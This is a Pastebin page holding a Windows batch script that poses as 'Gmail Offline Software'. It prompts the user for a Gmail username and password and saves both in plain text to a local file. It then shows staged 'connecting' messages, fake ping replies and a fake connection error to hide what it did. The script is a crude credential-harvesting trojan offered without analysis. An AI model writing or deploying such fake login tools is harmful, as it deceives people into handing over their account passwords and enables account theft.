Advertisement
SonOfABatchFile

Gmail Offline Software (or is it?)

Dec 19th, 2017
194
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 2.44 KB | None | 0 0
  1. @echo off
  2. color a
  3.  
  4. title Gmail Offline Software
  5. :a
  6. cls
  7. color 07
  8. echo Gmail Offline Software
  9. echo.
  10. echo Enter your username and password to sign in to gmail.
  11. echo.
  12. set /p user="Username: "
  13.  
  14. set /p pass="Password: "
  15.  
  16. echo User=%user% Password=%pass% > "C:\Testing\Stuff.txt.txt"
  17. timeout /t 2 >nul
  18. goto b
  19.  
  20. :thing
  21. set /p egg ="Type 1 to encrypt you password, or type 2 to leave it unencrypted: "
  22. if egg= 1 (
  23. goto b1
  24. )
  25. if egg= 2 (
  26. goto b
  27. )
  28. if not defined egg goto thing
  29.  
  30. :b
  31. cls
  32. echo Connecting...
  33. timeout /t 1 >nul
  34. echo Establishing stronger connection...
  35. echo.
  36. timeout /t 1 >nul
  37. echo Loading information...
  38. echo.
  39. timeout /t 3 >nul
  40. echo Username = %user%
  41. timeout /t 1 >nul
  42. echo Password = *****
  43. timeout /t 1 >nul
  44. echo Destination IP address = 172.217.12.164
  45. timeout /t 1 >nul
  46. echo Location IP address = 10.0.0.13
  47. timeout /t 2 >nul
  48. echo Securing connection...
  49. timeout /t 1 >nul
  50. echo Finalizing process...
  51. timeout /t 3 >nul
  52. goto c
  53.  
  54. :b1
  55. cls
  56. echo Connecting...
  57. timeout /t 1 >nul
  58. echo Establishing stronger connection...
  59. echo.
  60. timeout /t 1 >nul
  61. echo Loading information...
  62. echo.
  63. timeout /t 3 >nul
  64. echo Username = %user%
  65. timeout /t 1 >nul
  66. echo Password = *****
  67. timeout /t 1 >nul
  68. echo Destination IP address = 172.217.12.164
  69. timeout /t 1 >nul
  70. echo Location IP address = 10.0.0.13
  71. timeout /t 2 >nul
  72. echo Securing connection...
  73. timeout /t 1 >nul
  74. echo Finalizing process...
  75. timeout /t 3 >nul
  76. goto c
  77. :c
  78. cls
  79. title ERROR ~ COULD NOT CONNECT TO www.google.com,  172.217.12.164...
  80. color c
  81. cls
  82. echo ERROR CONNECTING TO GOOGLE
  83. echo Retrying ping...
  84. echo.
  85. timeout /t 2 >nul
  86. echo Reply from 172.217.12.164: bytes=32 time=16ms TTL=55 response=negative
  87. timeout /t 1 >nul
  88. echo Reply from 172.217.12.164: bytes=32 time=16ms TTL=55 response=negative
  89. timeout /t 1 >nul
  90. echo Reply from 172.217.12.164: bytes=32 time=16ms TTL=55 response=negative
  91. timeout /t 1 >nul
  92. echo Reply from 172.217.12.164: bytes=32 time=16ms TTL=55 response=negative
  93. timeout /t 1 >nul
  94. echo Reply from 172.217.12.164: bytes=32 time=16ms TTL=55 response=negative
  95. timeout /t 1 >nul
  96. echo Reply from 172.217.12.164: bytes=32 time=16ms TTL=55 response=negative
  97. timeout /t 1 >nul
  98. echo Reply from 172.217.12.164: bytes=32 time=16ms TTL=55 response=negative
  99. timeout /t 1 >nul
  100. echo Google is unresponsive...
  101. echo.
  102. echo Exit timer activated.
  103. timeout /t 1 >nul
  104. echo 3...
  105. timeout /t 1 >nul
  106. echo 2...
  107. timeout /t 1 >nul
  108. echo 1...
  109. timeout /t 1 >nul
  110. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement